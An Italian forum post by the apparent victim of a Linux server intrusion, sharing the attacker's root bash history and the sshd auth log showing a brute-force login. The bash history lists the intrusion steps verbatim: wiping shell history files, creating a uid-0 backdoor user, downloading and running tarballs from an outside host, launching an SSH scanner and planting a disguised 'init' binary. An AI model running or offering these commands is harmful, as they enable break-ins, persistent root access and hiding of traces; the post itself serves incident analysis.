posto di seguito alcuni logggoni

non so se sono utili a sapere qualcosa ma sono gli unici rimasti ...
<BR>
<BR>primo rimasto e´ il log della bash di Root
<BR>
<BR>w
<BR>dir -a
<BR>rm -rf .bash_history .bash_logout .fullcircle .ICEauthority .rfbdrake .vimrc
<BR>ls
<BR>dir -a
<BR>rm -rf .bash_profile .bashrc
<BR>/usr/sbin/adduser admin -g0 -o -u0
<BR>passwd admin
<BR>cat /etc/issue
<BR>/sbin/ifconfig
<BR>cd /var/tmp
<BR>wget bone.go.ro/mirkforce.tgz
<BR>tar -xzvf mirkforce.tgz
<BR>rm -rf mirkforce.tgz
<BR>cd ./ecmf/
<BR>./mirkforce
<BR>cd ..
<BR>ls
<BR>rm -rf ./ecmf/
<BR>cd /var/spool/samba/
<BR>ls
<BR>wget bone.go.ro/hait.tgz
<BR>tar -xzvf hait.tgz
<BR>rm -rf hait.tgz
<BR>cd ssh/
<BR>./go.sh 210.21
<BR>cd ..
<BR>ls
<BR>rm -rf ssh/
<BR>wget bone.go.ro/bone.tgz
<BR>tar -xzvf bone.tgz
<BR>rm -rf bone.tgz
<BR>cd " "
<BR>ls
<BR>mv lroot init
<BR>export PATH=.:$PATH
<BR>init
<BR>cd " "
<BR>ls
<BR>wget bone.go.ro/treeball.tgz
<BR>tar -xzvf treeball.tgz
<BR>dir -a
<BR>rm -rf treeball.tgz
<BR>ls
<BR>
<BR>Come si note han creato l´utente Admin, quello che mi insospettito all´avvio di mandrakkia, e poi il resto e´ storia

.
<BR>
<BR>e questo i log Auth in var/log
<BR>
<BR>Feb 15 21:20:00 francesco sshd[21706]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:21:18 francesco sshd[21763]: Invalid user test from 217.29.80.92
<BR>Feb 15 21:21:18 francesco sshd[21763]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:18 francesco sshd[21763]: Failed password for invalid user test from 217.29.80.92 port 13155 ssh2
<BR>Feb 15 21:21:20 francesco sshd[21765]: Invalid user guest from 217.29.80.92
<BR>Feb 15 21:21:20 francesco sshd[21765]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:20 francesco sshd[21765]: Failed password for invalid user guest from 217.29.80.92 port 13239 ssh2
<BR>Feb 15 21:21:22 francesco sshd[21770]: Invalid user admin from 217.29.80.92
<BR>Feb 15 21:21:22 francesco sshd[21770]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:22 francesco sshd[21770]: Failed password for invalid user admin from 217.29.80.92 port 13315 ssh2
<BR>Feb 15 21:21:25 francesco sshd[21772]: Invalid user admin from 217.29.80.92
<BR>Feb 15 21:21:25 francesco sshd[21772]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:25 francesco sshd[21772]: Failed password for invalid user admin from 217.29.80.92 port 13439 ssh2
<BR>Feb 15 21:21:27 francesco sshd[21777]: Invalid user user from 217.29.80.92
<BR>Feb 15 21:21:27 francesco sshd[21777]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:27 francesco sshd[21777]: Failed password for invalid user user from 217.29.80.92 port 13538 ssh2
<BR>Feb 15 21:21:29 francesco sshd[21779]: Failed password for root from 217.29.80.92 port 13627 ssh2
<BR>Feb 15 21:21:31 francesco sshd[21784]: Accepted password for root from 217.29.80.92 port 13700 ssh2
<BR>Feb 15 21:22:06 francesco sshd[21845]: Accepted password for root from 81.181.153.217 port 1251 ssh2
<BR>Feb 15 21:22:57 francesco adduser[21925]: new user: name=admin, uid=0, gid=0, home=/home/admin, shell=/bin/bash
<BR>Feb 15 21:23:04 francesco passwd(pam_unix)[21929]: password changed for admin
<BR>Feb 15 21:25:00 francesco sshd[22060]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:30:00 francesco sshd[22316]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:33:53 francesco xinetd[5064]: START: sgi_fam pid=22502 from=<no address>
<BR>Feb 15 21:35:01 francesco sshd[22580]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:40:00 francesco sshd[22840]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:45:01 francesco sshd[23085]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:50:00 francesco sshd[23313]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:55:00 francesco sshd[23526]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 22:00:00 francesco sshd[23740]: Did not receive identification string from 127.0.0.1
<BR>
<BR>si nota solo l´ora di inizio e poco altro apparte il loro ip

ma ovviamente saran passati da proxy o avran cmqe usato qualcosa per renderlo inutile ...
<BR>Ovviamente prima dei suddetti log avran fatto qualcosa per avere i privilegi di root o roba simile, non sono un esperto pultroppo.
<BR>
<BR>